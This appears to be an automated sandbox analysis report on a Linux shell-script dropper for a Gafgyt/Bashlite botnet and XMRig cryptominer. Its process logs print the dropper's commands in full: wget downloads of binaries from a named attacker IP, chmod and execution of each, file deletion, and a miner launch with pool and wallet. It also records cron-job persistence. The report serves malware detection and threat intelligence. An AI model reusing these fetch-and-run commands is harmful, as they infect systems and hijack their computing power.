Malware Analysis Report

2024-11-13 18:03

Sample ID 241109-eqsh1sznbm
Target tyo2831qq.sh
SHA256 5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
Tags
gafgyt botnet defense_evasion discovery execution persistence privilege_escalatio xmrig xmrig_linux miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199

Threat Level: Known bad

The file tyo2831qq.sh was found to be: Known bad.

Malicious Activity Summary

gafgyt botnet defense_evasion discovery execution persistence privilege_escalatio xmrig xmrig_linux miner

xmrig

Xmrig_linux family

XMRig Miner payload

Xmrig family

Detected Gafgyt variant

Gafgyt family

Gafgyt/Bashlite

Executes dropped EXE

File and Directory Permissions Modification

Creates/modifies Cron job

Legitimate hosting services abused for malware hosting/C2

Reads system routing table

Writes file to system bin folder

Reads system network configuration

Reads runtime system information

Writes file to tmp directory

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 04:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 04:09

Reported

2024-11-09 04:11

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

95s

Max time network

128s

Command Line

[/tmp/tyo2831qq.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt family

gafgyt

Gafgyt/Bashlite

botnet gafgyt

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/bots /tmp/bots N/A
N/A /tmp/fileibWhol /tmp/fileibWhol N/A
N/A /tmp/filebGBbym /tmp/filebGBbym N/A
N/A /tmp/filedQZH4W /tmp/filedQZH4W N/A
N/A /tmp/fileIZmINp /tmp/fileIZmINp N/A
N/A /tmp/fileyOeFL0 /tmp/fileyOeFL0 N/A
N/A /tmp/filelEGrRt /tmp/filelEGrRt N/A
N/A /tmp/fileNiUUx5 /tmp/fileNiUUx5 N/A
N/A /tmp/file2WqZIz /tmp/file2WqZIz N/A
N/A /tmp/fileD5R9Xa /tmp/fileD5R9Xa N/A
N/A /tmp/fileGhyk4A /tmp/fileGhyk4A N/A
N/A /tmp/filel8AkDc /tmp/filel8AkDc N/A
N/A /tmp/fileCSmOoG /tmp/fileCSmOoG N/A
N/A /tmp/fileVJaGhi /tmp/fileVJaGhi N/A
N/A /tmp/fileGF37SJ /tmp/fileGF37SJ N/A
N/A /tmp/fileoIRPGl /tmp/fileoIRPGl N/A
N/A /tmp/fileoAru1O /tmp/fileoAru1O N/A
N/A /tmp/fileDaBA4r /tmp/fileDaBA4r N/A
N/A /tmp/filedLbafW /tmp/filedLbafW N/A
N/A /tmp/file3O8iBx /tmp/file3O8iBx N/A
N/A /tmp/fileAOvPk1 /tmp/fileAOvPk1 N/A
N/A /tmp/fileCwJsFC /tmp/fileCwJsFC N/A
N/A /tmp/fileyEYfs5 /tmp/fileyEYfs5 N/A
N/A /tmp/fileueaHmH /tmp/fileueaHmH N/A
N/A /tmp/fileH1vC07 /tmp/fileH1vC07 N/A
N/A /tmp/filem6VSkI /tmp/filem6VSkI N/A
N/A /tmp/fileh2Azrd /tmp/fileh2Azrd N/A
N/A /tmp/filexXoNQO /tmp/filexXoNQO N/A
N/A /tmp/fileOf8Bu8 /tmp/fileOf8Bu8 N/A
N/A /tmp/file4hnC0J /tmp/file4hnC0J N/A
N/A /tmp/fileI7IdvX /tmp/fileI7IdvX N/A
N/A /tmp/fileQoM44m /tmp/fileQoM44m N/A
N/A /tmp/fileLoiThM /tmp/fileLoiThM N/A
N/A /tmp/fileUnYIGZ /tmp/fileUnYIGZ N/A
N/A /tmp/filevfTFbq /tmp/filevfTFbq N/A
N/A /tmp/file3rmi0O /tmp/file3rmi0O N/A
N/A /tmp/filedOlYi6 /tmp/filedOlYi6 N/A
N/A /tmp/fileFw29Lt /tmp/fileFw29Lt N/A
N/A /tmp/fileyKTYD6 /tmp/fileyKTYD6 N/A
N/A /tmp/filenm6bft /tmp/filenm6bft N/A
N/A /tmp/fileJtGkIU /tmp/fileJtGkIU N/A
N/A /tmp/fileouKtFj /tmp/fileouKtFj N/A
N/A /tmp/filewTNYwB /tmp/filewTNYwB N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/cron.hourly/0 /tmp/fileD5R9Xa N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileVJaGhi N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileoIRPGl N/A
File opened for modification /etc/cron.hourly/0 /tmp/file3rmi0O N/A
File opened for modification /etc/cron.hourly/0 /tmp/filedOlYi6 N/A
File opened for modification /etc/cron.hourly/0 /tmp/tyo2831qq.x86 N/A
File opened for modification /etc/cron.hourly/0 /tmp/filedQZH4W N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileNiUUx5 N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileCSmOoG N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileAOvPk1 N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileUnYIGZ N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileibWhol N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileCwJsFC N/A
File opened for modification /etc/cron.hourly/0 /tmp/filem6VSkI N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileI7IdvX N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileLoiThM N/A
File opened for modification /etc/cron.hourly/0 /tmp/filevfTFbq N/A
File opened for modification /etc/cron.hourly/0 /tmp/filenm6bft N/A
File opened for modification /etc/cron.hourly/0 /tmp/filebGBbym N/A
File opened for modification /etc/cron.hourly/0 /tmp/filedLbafW N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileueaHmH N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileyKTYD6 N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileyOeFL0 N/A
File opened for modification /etc/cron.hourly/0 /tmp/file2WqZIz N/A
File opened for modification /etc/cron.hourly/0 /tmp/filel8AkDc N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileGF37SJ N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileDaBA4r N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileh2Azrd N/A
File opened for modification /etc/cron.hourly/0 /tmp/file4hnC0J N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileJtGkIU N/A
File opened for modification /etc/cron.hourly/0 /tmp/filelEGrRt N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileoAru1O N/A
File opened for modification /etc/cron.hourly/0 /tmp/file3O8iBx N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileQoM44m N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileouKtFj N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileIZmINp N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileGhyk4A N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileyEYfs5 N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileH1vC07 N/A
File opened for modification /etc/cron.hourly/0 /tmp/filexXoNQO N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileFw29Lt N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileOf8Bu8 N/A

Reads system routing table

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.i586 N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/ls /tmp/tyo2831qq.x86 N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.i586 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/exe /tmp/file2WqZIz N/A
File opened for reading /proc/self/exe /tmp/fileD5R9Xa N/A
File opened for reading /proc/self/exe /tmp/fileVJaGhi N/A
File opened for reading /proc/self/exe /tmp/fileoAru1O N/A
File opened for reading /proc/self/exe /tmp/fileCwJsFC N/A
File opened for reading /proc/self/exe /tmp/fileyEYfs5 N/A
File opened for reading /proc/self/exe /tmp/fileQoM44m N/A
File opened for reading /proc/self/exe /tmp/filebGBbym N/A
File opened for reading /proc/self/exe /tmp/filelEGrRt N/A
File opened for reading /proc/self/exe /tmp/fileueaHmH N/A
File opened for reading /proc/self/exe /tmp/fileH1vC07 N/A
File opened for reading /proc/self/exe /tmp/file4hnC0J N/A
File opened for reading /proc/self/exe /tmp/tyo2831qq.x86 N/A
File opened for reading /proc/self/exe /tmp/fileibWhol N/A
File opened for reading /proc/self/exe /tmp/fileAOvPk1 N/A
File opened for reading /proc/self/exe /tmp/filem6VSkI N/A
File opened for reading /proc/self/exe /tmp/fileI7IdvX N/A
File opened for reading /proc/self/exe /tmp/fileLoiThM N/A
File opened for reading /proc/self/exe /tmp/file3rmi0O N/A
File opened for reading /proc/self/exe /tmp/fileJtGkIU N/A
File opened for reading /proc/self/exe /tmp/filel8AkDc N/A
File opened for reading /proc/self/exe /tmp/fileGF37SJ N/A
File opened for reading /proc/self/exe /tmp/fileh2Azrd N/A
File opened for reading /proc/self/exe /tmp/filexXoNQO N/A
File opened for reading /proc/self/exe /tmp/fileFw29Lt N/A
File opened for reading /proc/self/exe /tmp/filewTNYwB N/A
File opened for reading /proc/self/exe /tmp/filedQZH4W N/A
File opened for reading /proc/self/exe /tmp/fileGhyk4A N/A
File opened for reading /proc/self/exe /tmp/fileDaBA4r N/A
File opened for reading /proc/self/exe /tmp/fileOf8Bu8 N/A
File opened for reading /proc/self/exe /tmp/fileCSmOoG N/A
File opened for reading /proc/self/exe /tmp/file3O8iBx N/A
File opened for reading /proc/self/exe /tmp/fileUnYIGZ N/A
File opened for reading /proc/self/exe /tmp/filedOlYi6 N/A
File opened for reading /proc/self/exe /tmp/fileyKTYD6 N/A
File opened for reading /proc/self/exe /tmp/fileIZmINp N/A
File opened for reading /proc/self/exe /tmp/fileyOeFL0 N/A
File opened for reading /proc/self/exe /tmp/fileNiUUx5 N/A
File opened for reading /proc/self/exe /tmp/filedLbafW N/A
File opened for reading /proc/self/exe /tmp/fileouKtFj N/A
File opened for reading /proc/self/exe /tmp/fileoIRPGl N/A
File opened for reading /proc/self/exe /tmp/filevfTFbq N/A
File opened for reading /proc/self/exe /tmp/filenm6bft N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/tyo2831qq.mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/file3O8iBx /tmp/filedLbafW N/A
File opened for modification /tmp/fileyEYfs5 /tmp/fileCwJsFC N/A
File opened for modification /tmp/fileueaHmH /tmp/fileyEYfs5 N/A
File opened for modification /tmp/fileOf8Bu8 /tmp/filexXoNQO N/A
File opened for modification /tmp/tyo2831qq.m68k /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x86 /usr/bin/wget N/A
File opened for modification /tmp/bots /tmp/tyo2831qq.x86 N/A
File opened for modification /tmp/fileyOeFL0 /tmp/fileIZmINp N/A
File opened for modification /tmp/filedLbafW /tmp/fileDaBA4r N/A
File opened for modification /tmp/filem6VSkI /tmp/fileH1vC07 N/A
File opened for modification /tmp/fileh2Azrd /tmp/filem6VSkI N/A
File opened for modification /tmp/bots /usr/bin/wget N/A
File opened for modification /tmp/fileibWhol /tmp/tyo2831qq.x86 N/A
File opened for modification /tmp/filedQZH4W /tmp/filebGBbym N/A
File opened for modification /tmp/fileI7IdvX /tmp/file4hnC0J N/A
File opened for modification /tmp/file3rmi0O /tmp/filevfTFbq N/A
File opened for modification /tmp/filedOlYi6 /tmp/file3rmi0O N/A
File opened for modification /tmp/filewTNYwB /tmp/fileouKtFj N/A
File opened for modification /tmp/tyo2831qq.mpsl /usr/bin/wget N/A
File opened for modification /tmp/filelEGrRt /tmp/fileyOeFL0 N/A
File opened for modification /tmp/fileVJaGhi /tmp/fileCSmOoG N/A
File opened for modification /tmp/fileoAru1O /tmp/fileoIRPGl N/A
File opened for modification /tmp/fileDaBA4r /tmp/fileoAru1O N/A
File opened for modification /tmp/tyo2831qq.arm7 /usr/bin/wget N/A
File opened for modification /tmp/fileIZmINp /tmp/filedQZH4W N/A
File opened for modification /tmp/filel8AkDc /tmp/fileGhyk4A N/A
File opened for modification /tmp/fileGF37SJ /tmp/fileVJaGhi N/A
File opened for modification /tmp/fileAOvPk1 /tmp/file3O8iBx N/A
File opened for modification /tmp/fileH1vC07 /tmp/fileueaHmH N/A
File opened for modification /tmp/file4hnC0J /tmp/fileOf8Bu8 N/A
File opened for modification /tmp/filekKP7GW /tmp/fileFw29Lt N/A
File opened for modification /tmp/fileJtGkIU /tmp/filenm6bft N/A
File opened for modification /tmp/fileX9kSc0 /tmp/filewTNYwB N/A
File opened for modification /tmp/tyo2831qq.mips /usr/bin/wget N/A
File opened for modification /tmp/filebGBbym /tmp/fileibWhol N/A
File opened for modification /tmp/fileNiUUx5 /tmp/filelEGrRt N/A
File opened for modification /tmp/fileCSmOoG /tmp/filel8AkDc N/A
File opened for modification /tmp/fileoIRPGl /tmp/fileGF37SJ N/A
File opened for modification /tmp/filevfTFbq /tmp/fileUnYIGZ N/A
File opened for modification /tmp/file2WqZIz /tmp/fileNiUUx5 N/A
File opened for modification /tmp/filexXoNQO /tmp/fileh2Azrd N/A
File opened for modification /tmp/fileQoM44m /tmp/fileI7IdvX N/A
File opened for modification /tmp/fileLoiThM /tmp/fileQoM44m N/A
File opened for modification /tmp/fileUnYIGZ /tmp/fileLoiThM N/A
File opened for modification /tmp/fileFw29Lt /tmp/filedOlYi6 N/A
File opened for modification /tmp/tyo2831qq.sh4 /usr/bin/wget N/A
File opened for modification /tmp/fileD5R9Xa /tmp/file2WqZIz N/A
File opened for modification /tmp/fileGhyk4A /tmp/fileD5R9Xa N/A
File opened for modification /tmp/fileCwJsFC /tmp/fileAOvPk1 N/A
File opened for modification /tmp/filenm6bft /tmp/fileyKTYD6 N/A
File opened for modification /tmp/fileouKtFj /tmp/fileJtGkIU N/A
File opened for modification /tmp/tyo2831qq.arm6 /usr/bin/wget N/A

Processes

/tmp/tyo2831qq.sh

[/tmp/tyo2831qq.sh]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mips]

/bin/chmod

[chmod 777 tyo2831qq.mips]

/tmp/tyo2831qq.mips

[./tyo2831qq.mips]

/usr/bin/wget

[wget http://31.172.80.237/bots]

/bin/chmod

[chmod 777 bots]

/tmp/bots

[./bots]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mpsl]

/bin/chmod

[chmod 777 tyo2831qq.mpsl]

/tmp/tyo2831qq.mpsl

[./tyo2831qq.mpsl]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.sh4]

/bin/chmod

[chmod 777 tyo2831qq.sh4]

/tmp/tyo2831qq.sh4

[./tyo2831qq.sh4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x86]

/bin/chmod

[chmod 777 tyo2831qq.x86]

/tmp/tyo2831qq.x86

[./tyo2831qq.x86]

/tmp/fileibWhol

[./tyo2831qq.x86]

/tmp/filebGBbym

[./tyo2831qq.x86]

/tmp/filedQZH4W

[./tyo2831qq.x86]

/tmp/fileIZmINp

[./tyo2831qq.x86]

/tmp/fileyOeFL0

[./tyo2831qq.x86]

/tmp/filelEGrRt

[./tyo2831qq.x86]

/tmp/fileNiUUx5

[./tyo2831qq.x86]

/tmp/file2WqZIz

[./tyo2831qq.x86]

/tmp/fileD5R9Xa

[./tyo2831qq.x86]

/tmp/fileGhyk4A

[./tyo2831qq.x86]

/tmp/filel8AkDc

[./tyo2831qq.x86]

/tmp/fileCSmOoG

[./tyo2831qq.x86]

/tmp/fileVJaGhi

[./tyo2831qq.x86]

/tmp/fileGF37SJ

[./tyo2831qq.x86]

/tmp/fileoIRPGl

[./tyo2831qq.x86]

/tmp/fileoAru1O

[./tyo2831qq.x86]

/tmp/fileDaBA4r

[./tyo2831qq.x86]

/tmp/filedLbafW

[./tyo2831qq.x86]

/tmp/file3O8iBx

[./tyo2831qq.x86]

/tmp/fileAOvPk1

[./tyo2831qq.x86]

/tmp/fileCwJsFC

[./tyo2831qq.x86]

/tmp/fileyEYfs5

[./tyo2831qq.x86]

/tmp/fileueaHmH

[./tyo2831qq.x86]

/tmp/fileH1vC07

[./tyo2831qq.x86]

/tmp/filem6VSkI

[./tyo2831qq.x86]

/tmp/fileh2Azrd

[./tyo2831qq.x86]

/tmp/filexXoNQO

[./tyo2831qq.x86]

/tmp/fileOf8Bu8

[./tyo2831qq.x86]

/tmp/file4hnC0J

[./tyo2831qq.x86]

/tmp/fileI7IdvX

[./tyo2831qq.x86]

/tmp/fileQoM44m

[./tyo2831qq.x86]

/tmp/fileLoiThM

[./tyo2831qq.x86]

/tmp/fileUnYIGZ

[./tyo2831qq.x86]

/tmp/filevfTFbq

[./tyo2831qq.x86]

/tmp/file3rmi0O

[./tyo2831qq.x86]

/tmp/filedOlYi6

[./tyo2831qq.x86]

/tmp/fileFw29Lt

[./tyo2831qq.x86]

/tmp/fileyKTYD6

[./tyo2831qq.x86]

/tmp/filenm6bft

[./tyo2831qq.x86]

/tmp/fileJtGkIU

[./tyo2831qq.x86]

/tmp/fileouKtFj

[./tyo2831qq.x86]

/tmp/filewTNYwB

[./tyo2831qq.x86]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm6]

/bin/chmod

[chmod 777 tyo2831qq.arm6]

/tmp/tyo2831qq.arm6

[./tyo2831qq.arm6]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x32]

/bin/chmod

[chmod 777 tyo2831qq.i586]

/tmp/tyo2831qq.i586

[./tyo2831qq.i586]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.m68k]

/bin/chmod

[chmod 777 tyo2831qq.m68k]

/tmp/tyo2831qq.m68k

[./tyo2831qq.m68k]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.spc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm7]

/bin/chmod

[chmod 777 tyo2831qq.arm7]

/tmp/tyo2831qq.arm7

[./tyo2831qq.arm7]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm5]

/bin/rm

[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]

/usr/bin/wget

[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]

/bin/chmod

[chmod 777 xmrig]

/tmp/xmrig

[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]

Network

Country Destination Domain Proto
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
N/A 224.0.0.251:5353 udp
DE 31.172.80.237:80 31.172.80.237 tcp
GB 89.187.167.3:443 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
US 1.1.1.1:53 github.com udp
US 1.1.1.1:53 github.com udp

Files

/tmp/bots

MD5 2615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA1 4286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256 e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512 b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78

/tmp/fileibWhol

MD5 a8a6992775589faecef1bc8cf38bdfc5
SHA1 b6903301aecf34539654f309b8c12773461920dc
SHA256 cae053bfac71081a19bd64ae66f3fc9a149bcbe492eeb46d33647e01ab18eb52
SHA512 dd803894a1bb9caa2bb4d1da70d35a531a7f76718d23392ff7ee511f489f413f2c79e82a3d7432685a36f470b69c74d211d18d050bee1a5d261c75131ee58fb8

/etc/cron.hourly/0

MD5 3f006f7f81fc17be7f4a0d3da0fad5de
SHA1 97a94d3d0654c6551057af3809b52572bd7f9f5d
SHA256 982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf
SHA512 97d2ac0057427b940ada7c0fc805c1966e2535c3c3767ca85fef4a7e0fdc9d4ef9eb133530408b1e439df067881cb317e948ad9bfd487e958a04c97d9db978e0

/tmp/fileibWhol

MD5 4ac062e7bafef554949de20763c54f7b
SHA1 24355a299d9aca3953a9fac256cdaf7be0249fda
SHA256 33368eb166229b262cb964cfa6412478278b2a23e5f0c3de24a56c28dac5eeb0
SHA512 b12f82c346dbe62b6a96e7c9d3185eb2fdca9cc29ba83e29a102fd746c93d72d919d8146840ab9338dc8a25a7fb2b400a0cd9d0ac2ea5a0471d283f81d115bb9

/tmp/bots

MD5 b0f19b181c8d6961d1fed5bda4def843
SHA1 6e00805b0e6204b1d0c249550567a385e2835226
SHA256 f4893c325586305fa20901ae1fa6059cc0fac29c57e915a2c6f79c99bb9b9bf7
SHA512 997cec78ea201ea7aafc17178dad49193832807971e2f56cbed487a17f1fb287f585f1022613e32ac70c0eac89ca9c253e4e860a2aa23589dc733fe8f8c94e9a

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 04:09

Reported

2024-11-09 04:11

Platform

debian9-armhf-20240418-en

Max time kernel

95s

Max time network

96s

Command Line

[/tmp/tyo2831qq.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/bots /tmp/bots N/A

Reads system routing table

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.arm7 N/A
File opened for reading /proc/net/route /tmp/tyo2831qq.arm6 N/A
File opened for reading /proc/net/route /tmp/tyo2831qq.ppc N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.ppc N/A
File opened for reading /proc/net/route /tmp/tyo2831qq.arm7 N/A
File opened for reading /proc/net/route /tmp/tyo2831qq.arm6 N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/tyo2831qq.mips N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tyo2831qq.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.ppc /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.i586 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.mips /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x86 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm6 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x32 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.m68k /usr/bin/wget N/A
File opened for modification /tmp/bots /usr/bin/wget N/A

Processes

/tmp/tyo2831qq.sh

[/tmp/tyo2831qq.sh]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mips]

/bin/chmod

[chmod 777 tyo2831qq.mips]

/tmp/tyo2831qq.mips

[./tyo2831qq.mips]

/usr/bin/wget

[wget http://31.172.80.237/bots]

/bin/chmod

[chmod 777 bots]

/tmp/bots

[./bots]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mpsl]

/bin/chmod

[chmod 777 tyo2831qq.mpsl]

/tmp/tyo2831qq.mpsl

[./tyo2831qq.mpsl]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.sh4]

/bin/chmod

[chmod 777 tyo2831qq.sh4]

/tmp/tyo2831qq.sh4

[./tyo2831qq.sh4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x86]

/bin/chmod

[chmod 777 tyo2831qq.x86]

/tmp/tyo2831qq.x86

[./tyo2831qq.x86]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm6]

/bin/chmod

[chmod 777 tyo2831qq.arm6]

/tmp/tyo2831qq.arm6

[./tyo2831qq.arm6]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x32]

/bin/chmod

[chmod 777 tyo2831qq.x32]

/tmp/tyo2831qq.x32

[./tyo2831qq.x32]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.ppc]

/bin/chmod

[chmod 777 tyo2831qq.ppc]

/tmp/tyo2831qq.ppc

[./tyo2831qq.ppc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.i586]

/bin/chmod

[chmod 777 tyo2831qq.i586]

/tmp/tyo2831qq.i586

[./tyo2831qq.i586]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.m68k]

/bin/chmod

[chmod 777 tyo2831qq.m68k]

/tmp/tyo2831qq.m68k

[./tyo2831qq.m68k]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.spc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm7]

/bin/chmod

[chmod 777 tyo2831qq.arm7]

/tmp/tyo2831qq.arm7

[./tyo2831qq.arm7]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm5]

/bin/rm

[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]

/usr/bin/wget

[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]

/bin/chmod

[chmod 777 xmrig]

/tmp/xmrig

[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]

Network

Country Destination Domain Proto
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
US 1.1.1.1:53 github.com udp

Files

/tmp/bots

MD5 2615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA1 4286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256 e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512 b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 04:09

Reported

2024-11-09 04:11

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

95s

Command Line

[/tmp/tyo2831qq.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
